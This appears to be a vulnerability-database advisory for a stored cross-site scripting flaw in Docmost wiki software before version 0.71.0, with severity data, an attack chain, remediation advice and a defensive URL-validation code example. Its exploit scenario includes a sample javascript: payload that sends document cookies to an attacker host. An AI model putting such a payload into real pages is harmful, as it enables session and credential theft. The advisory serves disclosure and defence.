
Docmost EUVD-2026-22754

CVE-2026-34212 · MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-14 · security-advisories@github.com
5.4 · CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
5.4 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Lifecycle Timeline (6 events)

Patch released: Apr 22, 2026 - 18:47 (nvd)
Patch available: Apr 16, 2026 - 05:29 (EUVD), version 0.71.0
Analysis Generated: Apr 14, 2026 - 22:43 (vuln.today)
EUVD ID Assigned: Apr 14, 2026 - 22:22 (euvd), EUVD-2026-22754
Analysis Generated: Apr 14, 2026 - 22:22 (vuln.today)
CVE Published: Apr 14, 2026 - 22:16 (nvd), MEDIUM 5.4

Description (GitHub Advisory)

Docmost is open-source collaborative wiki and documentation software. In versions prior to 0.71.0, improper neutralization of attachment URLs in Docmost allows a low-privileged authenticated user to store a malicious javascript: URL inside an attachment node in page content. When another user views the page and activates the attachment link/icon, attacker-controlled JavaScript executes in the context of the Docmost origin. Version 0.71.0 patches the issue.

Analysis (AI)

Stored cross-site scripting (XSS) in Docmost prior to version 0.71.0 allows authenticated users to inject malicious javascript: URLs into attachment nodes, executing arbitrary JavaScript in the browser context of other users who activate those attachments. The attack requires only low privileges and user interaction (clicking the attachment), so any user who views a compromised page is exposed. …
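The defect described above is a missing allow-list on the scheme of an attachment node's URL. The following is an added example of such a check, not Docmost's own code: the wiki origin `APP_ORIGIN`, the function names and the optional same-origin restriction are assumptions for illustration.

```javascript
// Added example (not Docmost's code): allow-list validation for the URL
// stored in an attachment node, so a node can never render as a link whose
// activation runs script. Only http(s) URLs and app-relative paths pass;
// javascript:, data:, vbscript: and every other scheme are rejected.

// Assumed origin the wiki is served from (hypothetical; a real deployment
// would take it from configuration or window.location).
const APP_ORIGIN = "https://wiki.example.test";

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Browsers strip leading/trailing C0 controls and spaces before parsing,
// so "  javascript:..." would still execute if accepted as-is.
function stripEdges(s) {
  return s.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
}

// Returns true only when `raw` parses to an http(s) URL (optionally also
// restricted to the app's own origin). Relative paths resolve against
// APP_ORIGIN. Parsing with the WHATWG URL class matters: it lowercases
// the scheme and drops embedded tab/newline characters, so "JaVaScRiPt:"
// and "java\tscript:" are both recognised as javascript: and rejected.
function isSafeAttachmentUrl(raw, sameOriginOnly = false) {
  if (typeof raw !== "string") return false;
  const cleaned = stripEdges(raw);
  if (cleaned === "") return false;
  let parsed;
  try {
    parsed = new URL(cleaned, APP_ORIGIN);
  } catch {
    return false; // unparseable input is rejected, never passed through
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return false;
  if (sameOriginOnly && parsed.origin !== APP_ORIGIN) return false;
  return true;
}

// Normalised href to render for an attachment node, or null when the
// stored value is unsafe (the renderer then emits the node without a link).
function safeAttachmentHref(raw, sameOriginOnly = false) {
  if (!isSafeAttachmentUrl(raw, sameOriginOnly)) return null;
  return new URL(stripEdges(raw), APP_ORIGIN).href;
}
```

Run the check both when the node is saved and when it is rendered: storage-time validation stops new payloads, render-time validation neutralises content that was stored before the fix.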


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Authenticate as low-privilege user
Delivery: Craft malicious attachment node with javascript: URL
Exploit: Store payload in page content
Execution: Victim views page and clicks attachment
Persist: JavaScript executes in victim's browser context
Impact: Session/credential theft or defacement

Vulnerability Assessment (AI)

Risk Assessment: CVSS 5.4 (Medium) with network vector, low attack complexity, and low privilege requirement reflects realistic attainability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario: A low-privileged user in a shared Docmost workspace creates a seemingly legitimate document and embeds an attachment node with a `javascript:` URL (e.g., `javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)`). When a colleague clicks the attachment icon to open it, the injected JavaScript executes in their browser under the Docmost origin, potentially exfiltrating session cookies, CSRF tokens, or sensitive page content. …
Remediation: Upgrade Docmost to version 0.71.0 or later, which patches the URL neutralization flaw. … Detailed patch versions, workarounds, and compensating controls in full report.


EUVD-2026-22754 vulnerability details – vuln.today
